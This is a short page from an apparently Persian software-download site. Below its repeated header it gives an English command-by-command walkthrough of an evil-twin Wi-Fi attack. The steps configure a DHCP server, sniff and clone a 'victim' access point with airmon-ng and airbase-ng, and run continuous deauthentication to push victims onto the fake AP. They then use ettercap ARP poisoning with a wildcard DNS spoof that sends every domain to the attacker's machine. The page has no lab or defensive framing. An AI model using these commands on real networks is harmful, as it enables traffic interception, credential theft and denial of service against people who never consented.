دانلود نرم افزار-تورانسل

دانلود نرم افزار-تورانسل

دانلود نرم افزار مرجع تخصصی نرم افزار
دانلود نرم افزار-تورانسل

دانلود نرم افزار-تورانسل

دانلود نرم افزار مرجع تخصصی نرم افزار

11

apt-get install isc-dhcp-server -y

dhcpd configure  :

mv /etc/dhcp/dhcpd.conf /etc/dhcp/dhcpd.conf.backup

leafpad /etc/dhcp/dhcpd.conf

ddns-update-style interim;

default-lease-time 600;

max-lease-time 7200;

subnet 192.168.2.128 netmask 255.255.255.128 {

option subnet-mask 255.255.255.128;

option broadcast-address 192.168.2.255;

option routers 192.168.2.129;

option domain-name-servers 8.8.8.8;

range 192.168.2.130 192.168.2.140;
}

sniff victim AP :

airmon-ng start wlan0
airodump-ng mon0

airmon-ng stop mon0

Create Fake AP :

airmon-ng start wlan0 [channel]

airbase-ng -e "AP name" -c [channel] mon0

Start at0 and dhcp server :

ifconfig at0 up

ifconfig at0 192.168.2.129 netmask 255.255.255.128

route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129

dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0

/etc/init.d/isc-dhcpd-server start

redirect victim to our fake access point :
aireplay-ng --deauth 0 -a access point mac -h our mac -c victim mac mon0
or
aireplay-ng --deauth 0 -a access point mac -h our mac mon0

dns spoof :

etter.dns
{

*.*        A    192.168.2.129
www.*.*        A    192.168.2.129

}

ettercap -Tqi at0 -M ARP // // -P dns_spoof